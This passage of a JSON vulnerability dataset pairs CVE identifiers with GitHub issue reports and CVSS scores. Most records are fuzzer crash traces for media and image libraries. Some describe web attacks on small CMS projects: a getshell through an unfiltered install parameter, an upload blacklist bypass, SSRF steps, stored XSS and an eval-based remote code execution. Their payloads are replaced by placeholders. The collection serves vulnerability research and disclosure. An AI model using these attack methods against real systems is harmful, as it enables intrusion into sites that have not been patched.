NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CBF: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Error: Unknown operator '\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u007f\ufffd\ufffd\ufffd\u001f\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd' Error: Unknown operator NUMBERTAG Error: Unknown operator NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG C7A2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG fdccfdb8fdb NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG General Protection Fault NUMBERTAG at NUMBERTAG C7A2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51515. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51516. "severity": "MEDIUM",
  51517. "baseScore": 5.5,
  51518. "impactScore": 3.6,
  51519. "exploitabilityScore": 1.8
  51520. },
  51521. {
  51522. "CVE_ID": "CVE-2020-19481",
  51523. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1267",
  51524. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1267",
  51525. "Repo_new": "gpac/gpac",
  51526. "Issue_Created_At": "2019-07-05T23:55:18Z",
  51527. "description": "Runtime error: member access within null pointer of type 'GF_M2TS_ES NUMBERTAG APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says: ~~~ Multiple different PAT on single TS found, ignoring new PAT declaration (table id NUMBERTAG extended table id NUMBERTAG MPEG NUMBERTAG TS] Invalid PMT es descriptor size for PID NUMBERTAG MPEG NUMBERTAG TS] PID NUMBERTAG reused across programs NUMBERTAG and NUMBERTAG not completely supported PATHTAG runtime error: member access within null pointer of type 'GF_M2TS_ES NUMBERTAG algrind says NUMBERTAG Invalid read of size NUMBERTAG at APITAG gf_m2ts_process_pmt APITAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd ~~~ Thanks, Manh Dung",
  51528. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51529. "severity": "MEDIUM",
  51530. "baseScore": 5.5,
  51531. "impactScore": 3.6,
  51532. "exploitabilityScore": 1.8
  51533. },
  51534. {
  51535. "CVE_ID": "CVE-2020-19481",
  51536. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1266",
  51537. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1266",
  51538. "Repo_new": "gpac/gpac",
  51539. "Issue_Created_At": "2019-07-05T23:46:50Z",
  51540. "description": "Runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says: ~~~ PATHTAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' ~~~ Valgrind says NUMBERTAG Invalid read of size NUMBERTAG at APITAG gf_m2ts_process_pmt APITAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG NUMBERTAG Address NUMBERTAG d8c NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG ~~~ Thanks, Manh Dung",
  51541. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51542. "severity": "MEDIUM",
  51543. "baseScore": 5.5,
  51544. "impactScore": 3.6,
  51545. "exploitabilityScore": 1.8
  51546. },
  51547. {
  51548. "CVE_ID": "CVE-2020-19481",
  51549. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1265",
  51550. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1265",
  51551. "Repo_new": "gpac/gpac",
  51552. "Issue_Created_At": "2019-07-05T23:46:25Z",
  51553. "description": "Runtime error: left shift of negative value APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master) due to an invalid read on function gf_m2ts_process_pmt APITAG APITAG URLTAG Command: APITAG info APITAG ASAN says: ~~~ PATHTAG runtime error: left shift of negative value NUMBERTAG algrind says NUMBERTAG Invalid read of size NUMBERTAG at APITAG gf_m2ts_process_pmt APITAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG NUMBERTAG Address NUMBERTAG d8e NUMBERTAG is NUMBERTAG bytes before a block of size NUMBERTAG in arena \"client\" ~~~ Thanks, Manh Dung",
  51554. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51555. "severity": "MEDIUM",
  51556. "baseScore": 5.5,
  51557. "impactScore": 3.6,
  51558. "exploitabilityScore": 1.8
  51559. },
  51560. {
  51561. "CVE_ID": "CVE-2020-19488",
  51562. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1263",
  51563. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1263",
  51564. "Repo_new": "gpac/gpac",
  51565. "Issue_Created_At": "2019-07-05T22:47:55Z",
  51566. "description": "Runtime error: member access within null pointer of type 'struct APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit APITAG on master) due to a null pointer dereference bug on function APITAG APITAG APITAG URLTAG Command: APITAG info APITAG ~~~ [iso file] Read Box type data NUMBERTAG at position NUMBERTAG has size NUMBERTAG but is not at root/file level, skipping NUMBERTAG Invalid read of size NUMBERTAG at APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by NUMBERTAG EEB: gf_isom_box_array_read_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by NUMBERTAG EEB: gf_isom_box_array_read_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by NUMBERTAG EEB: gf_isom_box_array_read_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd Segmentation fault ~~~ ASAN says: ~~~ [iso file] Read Box type data NUMBERTAG at position NUMBERTAG has size NUMBERTAG but is not at root/file level, skipping PATHTAG runtime error: member access within null pointer of type 'struct APITAG ~~~ Thanks, Manh Dung",
  51567. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51568. "severity": "MEDIUM",
  51569. "baseScore": 5.5,
  51570. "impactScore": 3.6,
  51571. "exploitabilityScore": 1.8
  51572. },
  51573. {
  51574. "CVE_ID": "CVE-2020-19490",
  51575. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/124",
  51576. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/124",
  51577. "Repo_new": "syoyo/tinyexr",
  51578. "Issue_Created_At": "2019-07-07T06:43:59Z",
  51579. "description": "Crash on APITAG Hi, Our fuzzer found a crash on tinyexr (the latest commit APITAG on master). I use your command to compile tinyexr as mentioned in NUMBERTAG URLTAG (clang++ version NUMBERTAG Ubuntu NUMBERTAG bit). APITAG URLTAG Command: test_tinyexr $POC Valgrind says NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG B2: APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) [clone . APITAG APITAG NUMBERTAG by NUMBERTAG CD8: APITAG , APITAG const , std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const , unsigned long, std::string ) [clone . APITAG APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG D3A7: APITAG APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG C2: main APITAG NUMBERTAG Address NUMBERTAG ffffff NUMBERTAG b1e NUMBERTAG is not stack'd, malloc'd or (recently) free'd ~~~ ASAN says: ~~~ APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' SUMMARY: APITAG undefined behavior APITAG in APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' SUMMARY: APITAG undefined behavior APITAG in ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c0 (pc NUMBERTAG de NUMBERTAG bp NUMBERTAG ffe NUMBERTAG ce NUMBERTAG sp NUMBERTAG ffe NUMBERTAG c NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG de NUMBERTAG in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) PATHTAG NUMBERTAG b NUMBERTAG fd in APITAG , APITAG const , std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const , unsigned long, APITAG std::char_traits APITAG , std::allocator APITAG > ) PATHTAG NUMBERTAG b NUMBERTAG in APITAG , APITAG const , unsigned char const , unsigned char const , unsigned long, char const ) PATHTAG NUMBERTAG fe in APITAG PATHTAG NUMBERTAG e1 in APITAG PATHTAG NUMBERTAG de1e in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in main PATHTAG NUMBERTAG fdba NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const NUMBERTAG ABORTING ~~~ Thanks, Manh Dung",
  51580. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51581. "severity": "MEDIUM",
  51582. "baseScore": 5.5,
  51583. "impactScore": 3.6,
  51584. "exploitabilityScore": 1.8
  51585. },
  51586. {
  51587. "CVE_ID": "CVE-2020-19491",
  51588. "Issue_Url_old": "https://github.com/pts/sam2p/issues/67",
  51589. "Issue_Url_new": "https://github.com/pts/sam2p/issues/67",
  51590. "Repo_new": "pts/sam2p",
  51591. "Issue_Created_At": "2019-07-18T11:15:24Z",
  51592. "description": "SEGV in APITAG APITAG Hi, I found a crash in the function APITAG on the latest commit APITAG of master. It seems that it is due to an incomplete patch of NUMBERTAG URLTAG . APITAG URLTAG Command: sam2p APITAG FILETAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG fff NUMBERTAG aaa0 sp NUMBERTAG fff NUMBERTAG aa NUMBERTAG T NUMBERTAG in APITAG , int, unsigned char ) PATHTAG NUMBERTAG e9df in APITAG ) PATHTAG NUMBERTAG ec NUMBERTAG in in_gif_reader PATHTAG NUMBERTAG in APITAG , APITAG const&, char const ) PATHTAG NUMBERTAG f3 in APITAG Files::FILEW&, char const const , unsigned char) PATHTAG NUMBERTAG a NUMBERTAG e in main PATHTAG NUMBERTAG f4e3c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG fa8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  51593. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51594. "severity": "HIGH",
  51595. "baseScore": 7.8,
  51596. "impactScore": 5.9,
  51597. "exploitabilityScore": 1.8
  51598. },
  51599. {
  51600. "CVE_ID": "CVE-2020-19497",
  51601. "Issue_Url_old": "https://github.com/tbeu/matio/issues/121",
  51602. "Issue_Url_new": "https://github.com/tbeu/matio/issues/121",
  51603. "Repo_new": "tbeu/matio",
  51604. "Issue_Created_At": "2019-07-27T07:03:07Z",
  51605. "description": "SEGV in APITAG Hi, I found a crash in APITAG (the latest commit APITAG on master). APITAG URLTAG Command: matdump APITAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG efcf (pc NUMBERTAG ff5bd4a NUMBERTAG ce bp NUMBERTAG ffd NUMBERTAG b NUMBERTAG sp NUMBERTAG ffd NUMBERTAG b NUMBERTAG T NUMBERTAG ff5bd4a NUMBERTAG cd in APITAG PATHTAG NUMBERTAG ff5bd4b8c NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG ff5bcc9a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  51606. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51607. "severity": "HIGH",
  51608. "baseScore": 8.8,
  51609. "impactScore": 5.9,
  51610. "exploitabilityScore": 2.8
  51611. },
  51612. {
  51613. "CVE_ID": "CVE-2020-19498",
  51614. "Issue_Url_old": "https://github.com/strukturag/libheif/issues/139",
  51615. "Issue_Url_new": "https://github.com/strukturag/libheif/issues/139",
  51616. "Repo_new": "strukturag/libheif",
  51617. "Issue_Created_At": "2019-07-28T10:14:30Z",
  51618. "description": "Floating point exception. Hi, I found a FPE bug on the latest commit fd0c NUMBERTAG d on master. APITAG URLTAG Command: examples/heif info APITAG Valgrind says NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGFPE NUMBERTAG Integer divide by zero at address NUMBERTAG AC NUMBERTAG at NUMBERTAG Fraction APITAG NUMBERTAG by NUMBERTAG operator APITAG NUMBERTAG by NUMBERTAG APITAG const APITAG NUMBERTAG by NUMBERTAG F NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG const ) APITAG NUMBERTAG by NUMBERTAG F: heif_context_read_from_file APITAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG main APITAG Floating point exception ~~~ Thanks, Manh Dung",
  51619. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51620. "severity": "HIGH",
  51621. "baseScore": 8.8,
  51622. "impactScore": 5.9,
  51623. "exploitabilityScore": 2.8
  51624. },
  51625. {
  51626. "CVE_ID": "CVE-2020-19499",
  51627. "Issue_Url_old": "https://github.com/strukturag/libheif/issues/138",
  51628. "Issue_Url_new": "https://github.com/strukturag/libheif/issues/138",
  51629. "Repo_new": "strukturag/libheif",
  51630. "Issue_Created_At": "2019-07-28T00:11:00Z",
  51631. "description": "SEGV in APITAG Hi, I found a bug on the latest commit fd0c NUMBERTAG d on master. APITAG URLTAG Command: examples/heif convert APITAG FILETAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG c bp NUMBERTAG ffc1ade NUMBERTAG a0 sp NUMBERTAG ffc1ade NUMBERTAG T NUMBERTAG b in APITAG APITAG APITAG const PATHTAG NUMBERTAG in APITAG int, unsigned int) const PATHTAG NUMBERTAG b6 in APITAG int, unsigned int&) const PATHTAG NUMBERTAG a in APITAG const PATHTAG NUMBERTAG c1a4 in APITAG PATHTAG NUMBERTAG fc in main PATHTAG NUMBERTAG f1ac NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ERRORTAG f NUMBERTAG in _start ( PATHTAG ERRORTAG f NUMBERTAG Thanks, Manh Dung",
  51632. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51633. "severity": "HIGH",
  51634. "baseScore": 8.8,
  51635. "impactScore": 5.9,
  51636. "exploitabilityScore": 2.8
  51637. },
  51638. {
  51639. "CVE_ID": "CVE-2020-19527",
  51640. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/66",
  51641. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/66",
  51642. "Repo_new": "idreamsoft/iCMS",
  51643. "Issue_Created_At": "2019-06-03T09:54:00Z",
  51644. "description": "ICMS install Getshell. ICMS install Getshell Vulnerability location\uff1a$db_name parameter in \\icms NUMBERTAG FILETAG . Cause :$db_name parameter is written directly to FILETAG without filtering CODETAG attack: FILETAG FILETAG Then request: FILETAG",
  51645. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51646. "severity": "CRITICAL",
  51647. "baseScore": 9.8,
  51648. "impactScore": 5.9,
  51649. "exploitabilityScore": 3.9
  51650. },
  51651. {
  51652. "CVE_ID": "CVE-2020-19547",
  51653. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/19",
  51654. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/19",
  51655. "Repo_new": "popojicms/popojicms",
  51656. "Issue_Created_At": "2019-06-05T07:08:34Z",
  51657. "description": "Any file read in the background. FILETAG FILETAG",
  51658. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  51659. "severity": "MEDIUM",
  51660. "baseScore": 6.5,
  51661. "impactScore": 3.6,
  51662. "exploitabilityScore": 2.8
  51663. },
  51664. {
  51665. "CVE_ID": "CVE-2020-19551",
  51666. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/177",
  51667. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/177",
  51668. "Repo_new": "wuzhicms/wuzhicms",
  51669. "Issue_Created_At": "2019-06-04T09:56:39Z",
  51670. "description": "Remote Code Execution Vulnerability in WUZHI CMS NUMBERTAG Remote Code Execution Vulnerability in WUZHI CMS NUMBERTAG File extension blacklist bypass when file upload can cause arbitrarily code execution. Detail: FILETAG sysorem.li APITAG",
  51671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  51672. "severity": "HIGH",
  51673. "baseScore": 8.8,
  51674. "impactScore": 5.9,
  51675. "exploitabilityScore": 2.8
  51676. },
  51677. {
  51678. "CVE_ID": "CVE-2020-19553",
  51679. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/179",
  51680. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/179",
  51681. "Repo_new": "wuzhicms/wuzhicms",
  51682. "Issue_Created_At": "2019-06-05T08:56:04Z",
  51683. "description": "Stored Cross Scripting Vulnerability Vulnerability in WUZHI CMS APITAG Stored Cross Scripting Vulnerability Vulnerability in WUZHI CMS NUMBERTAG attacker can upload the specific file to the server & it can cause javascript code execution when visited. View Detail APITAG Stored Cross Scripting APITAG hiboy APITAG",
  51684. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51685. "severity": "MEDIUM",
  51686. "baseScore": 5.4,
  51687. "impactScore": 2.7,
  51688. "exploitabilityScore": 2.3
  51689. },
  51690. {
  51691. "CVE_ID": "CVE-2020-19613",
  51692. "Issue_Url_old": "https://github.com/sunkaifei/FlyCms/issues/1",
  51693. "Issue_Url_new": "https://github.com/sunkaifei/flycms/issues/1",
  51694. "Repo_new": "sunkaifei/flycms",
  51695. "Issue_Created_At": "2019-06-12T09:54:51Z",
  51696. "description": "There is a SSRF vulnerability. An issue was discovered in APITAG There is a security vulnerability in file APITAG , in APITAG function, result in a SSRF . SSRF \u00ad Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet. POC APITAG Send the request is as follows\uff1a CODETAG FILETAG We can see that it will call APITAG to fetch remote image when add a question. FILETAG In funtion APITAG can use APITAG bypass reg or request other url directly\uff0cand APITAG is called here. FILETAG Finally APITAG result in SSRF. FILETAG Still in APITAG we can find the file path, file APITAG APITAG finally failed, but file will create. File path is the date tody, example APITAG File name is concat md5(date + filenum) + filenum + extension FILETAG md NUMBERTAG result is NUMBERTAG of md NUMBERTAG resulst. FILETAG And we can get server time from response, after convert timezone, we can caculate the result. FILETAG so filename is APITAG \uff0cabsolute path is APITAG Request the path we can download file named APITAG . FILETAG It's SSRF result.",
  51697. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  51698. "severity": "HIGH",
  51699. "baseScore": 7.5,
  51700. "impactScore": 3.6,
  51701. "exploitabilityScore": 3.9
  51702. },
  51703. {
  51704. "CVE_ID": "CVE-2020-19616",
  51705. "Issue_Url_old": "https://github.com/langhsu/mblog/issues/27",
  51706. "Issue_Url_new": "https://github.com/langhsu/mblog/issues/27",
  51707. "Repo_new": "langhsu/mblog",
  51708. "Issue_Created_At": "2019-06-14T03:01:27Z",
  51709. "description": "There are two stored XSS vulnerability. A xss vulnerability was discovered in mblog. In mblog NUMBERTAG stored XSS exists via the APITAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc ERRORTAG FILETAG FILETAG Another stored XSS exists via the APITAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc ERRORTAG FILETAG FILETAG FILETAG",
  51710. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51711. "severity": "MEDIUM",
  51712. "baseScore": 5.4,
  51713. "impactScore": 2.7,
  51714. "exploitabilityScore": 2.3
  51715. },
  51716. {
  51717. "CVE_ID": "CVE-2020-19625",
  51718. "Issue_Url_old": "https://github.com/oria/gridx/issues/433",
  51719. "Issue_Url_new": "https://github.com/oria/gridx/issues/433",
  51720. "Repo_new": "oria/gridx",
  51721. "Issue_Created_At": "2019-06-14T01:51:59Z",
  51722. "description": "Remote Code Execution Vulnerability in gridx latest version. hi, We found a remote code execution vulnerability in gridx latest version that could allow an attacker to remotely execute arbitrary code to attack an attack server. FILETAG code line in NUMBERTAG The query parameter is directly brought into the eval function. payload: URLTAG This payload execution APITAG FILETAG fix: In php, the eval function is dangerous. It is not recommended to use it. If you must use it, you need to limit the incoming data.",
  51723. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51724. "severity": "CRITICAL",
  51725. "baseScore": 9.8,
  51726. "impactScore": 5.9,
  51727. "exploitabilityScore": 3.9
  51728. },
  51729. {
